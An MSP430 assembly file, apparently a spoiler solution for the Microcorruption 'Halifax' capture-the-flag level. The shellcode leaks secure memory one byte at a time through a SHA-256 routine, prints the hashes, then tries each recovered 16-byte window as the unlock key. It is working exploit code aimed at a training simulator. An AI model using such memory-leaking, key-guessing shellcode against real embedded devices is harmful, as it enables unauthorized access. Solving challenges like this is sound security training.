msp430-repl/sample-asm/shellcode.asm

; © 2023-2024 John Breaux
; Comtains spoilers for Microcorruption Halifax! Be warned!


const:
.define msize  0x1    ; length of each hash in bytes
.define hsize  0x3    ; bytes kept per hash (only needs to be 3 to determine 1 byte of sram)
.define sr_len 0x140  ; number of bytes in sram to dump
.define haddr  0x7000 ; address of the big hash array
.define iaddr  0x8000 ; address of the sram input buffer
.define kaddr  0x9000 ; address of the key buffer
external_data:
.define HEX_LUT 0x4710; "0123456789ABCDEF"
external_func:
; INT(int interrupt, ...)
.define INT             #0x4550
; getsn(void *dest, size_t len)
.define getsn           #0x4568
; putchar(char character)
.define putchar         #0x4578
; puts(char *str)
.define puts            #0x4586
; memcpy(void *dest, void *src, size_t len)
.define memcpy          #0x45a4
; sha256_internal(void *sram_addr, size_t sr_len, void * sha_buf)
.define sha256_internal #0x45b6
; memset(void* buf, char value, size_t length)
.define memset          #0x45c8

get_sram_hashes:
    clr   r11                   ; loop variable in r11
    mov   #msize, r14           ; r14 = 1
    mov   #haddr, r13           ; set destination to 0x8000
    sr_loop:
        mov   r11, r15          ; mov addr r15
        call  sha256_internal   ; sha256_internal (i, msize, haddr + i * hsize)
        add   #hsize, r13       ; keep 3 bytes of the output
        inc   r11               ; inc r11
        cmp   #sr_len, r11      ; do that sram_len times
        jnc   sr_loop

print_hex:
    clr   r11;
    ph_loop:
        mov.b haddr(r11), r14
        mov.b r14, r15
        rra   r15               ; using rra here instead of rra.b means the value won't roll into the highest bit
        rra   r15               ; which negates the need to and 0xf, r15
        rra   r15
        rra   r15
        clrc
        and   #0xf, r14
        mov.b HEX_LUT(r15), r15
        call  putchar           ; putchar (HEX_LUT[haddr[i] >> 4])
        mov.b HEX_LUT(r14), r15
        call  putchar           ; putchar (HEX_LUT[haddr[i] & 0xf])
        inc   r11
        cmp   #sr_len * hsize, r11  ; do that sram_length * hash_size times
        jnc   ph_loop

    mov.b #'\n', r15            ; '\n'
    call  putchar               ; putchar ('\n')


take_input:
    mov   #sr_len, r14
    mov   #iaddr, r15
    call  getsn                 ; getsn (iaddr, sr_len)

check_all_passwords:
    ;for i in 0..sr_len:
    clr   r9
    pw_loop:
        ; 	memcpy (kaddr, iaddr + i, len)
        mov   #0x10, r13
        mov   #iaddr, r14
        add   r9, r14
        mov   #kaddr, r15
        call  memcpy
        ; INT (0x42, key)
        push  #kaddr
        push  #0x42
        call  INT
        add   #4, sp
        ; INT (7f)
        unlock7f:
        push  #0
        push  #0
        push  #0x7f
        call  INT
        add   #6, sp
        inc   r9
        cmp   #sr_len, r9
        jl    pw_loop

end:
    ret